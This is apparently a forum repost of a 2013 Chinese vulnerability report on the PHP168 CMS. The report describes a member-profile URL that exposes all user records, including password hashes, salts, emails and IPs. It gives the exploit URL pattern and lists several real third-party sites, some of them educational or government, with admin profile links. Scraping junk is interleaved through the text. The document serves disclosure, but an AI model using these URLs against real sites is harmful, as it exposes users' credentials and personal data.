|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile0 x: N6 U3 w- {# v4 n( ~/ {$ B# B
o! v, \1 w4 L0 _2 X
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
. B" H; W1 b7 u+ l/ n& D% g* ]6 w: r8 ]- U# V5 o+ j$ L
http://php168.cn/com/homepage.php/admin/member-profile" P8 \0 n5 t$ ~2 q$ H
* w6 `( [, l G G/ a5 ^由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
+ [; |' ]; }% u7 I. V9 Yhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg9 b+ u) q3 V5 l
6 D \* f$ B8 ]3 S- E 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
6 Y9 ^3 }9 B3 z* D) F# {5 u$ y, [
http://www.zjfzol.com.cn/homepage.php/admin/member-profile9 o$ ]6 f( k( ^( z/ f
5 `' j1 {' |2 e# j2 z1 D" f4 m& _) c( N
http://www.scswl.cn/homepage.php/admin/member-profile3 u- S" t9 C2 o' y
: |% Y- \( @5 R& w% ~9 ^
http://www.tunet.edu.cn/homepage.php/admin/member-profile
}1 z' a& I7 d) d+ L8 ~9 S* @! H5 |- P) e+ F1 u) \2 O2 g/ D
http://www.itlead.com.cn/homepage.php/admin/member-profile( o4 K; H* d& e5 v" |" h# ?
$ A. L6 Y8 @0 `0 T( F
http://www.aedp.cn/homepage.php/admin/member-profile
$ d/ V/ R) J2 I9 B" S( h; e8 T
4 K" ]" G: a& a0 A) V$ nhttp://www.qianlongnews.com/homepage.php/test/member-profile: l7 R. Z5 s/ T9 L, C* i
* ^; d4 {# i8 H# W+ E
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
: v8 B" `3 M2 w9 k! `5 U4 W. d[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对